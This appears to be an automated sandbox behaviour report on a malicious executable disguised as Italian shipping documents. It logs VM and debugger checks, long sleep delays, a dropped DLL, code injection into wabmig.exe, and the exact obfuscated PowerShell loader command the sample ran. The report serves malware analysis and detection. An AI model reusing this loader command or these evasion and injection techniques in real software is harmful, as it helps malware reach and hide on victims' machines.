Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

API/Special instruction interceptor: Address: 43055C7

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Memory allocated: 23BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Memory allocated: 23A40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598744	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598403	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598254	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597746	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597605	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597480	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597246	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596764	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596653	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596216	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595883	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593688	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7555	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2052	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Window / User API: threadDelayed 3931	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Window / User API: threadDelayed 5876	Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3448	Thread sleep count: 3931 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3448	Thread sleep count: 5876 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598744s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598403s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598254s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -598091s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597746s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597605s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597480s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597246s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596764s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596653s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596544s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596216s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595883s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594282s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -593813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 3744	Thread sleep time: -593688s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598744	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598403	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598254	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597746	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597605	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597480	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597246	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596764	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596653	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596216	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595883	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Thread delayed: delay time: 593688	Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wabmig.exe, 00000006.00000002.2932025679.0000000008180000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wabmig.exe, 00000006.00000002.2932025679.0000000008152000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`N

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	API call chain: ExitProcess graph end node			graph_0-3754
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	API call chain: ExitProcess graph end node			graph_0-3905

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_0097DAAC LdrInitializeThunk,LdrInitializeThunk,

1_2_0097DAAC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3C60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 26DF8D8			Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Code function: 0_2_73A91096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,

0_2_73A91096

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
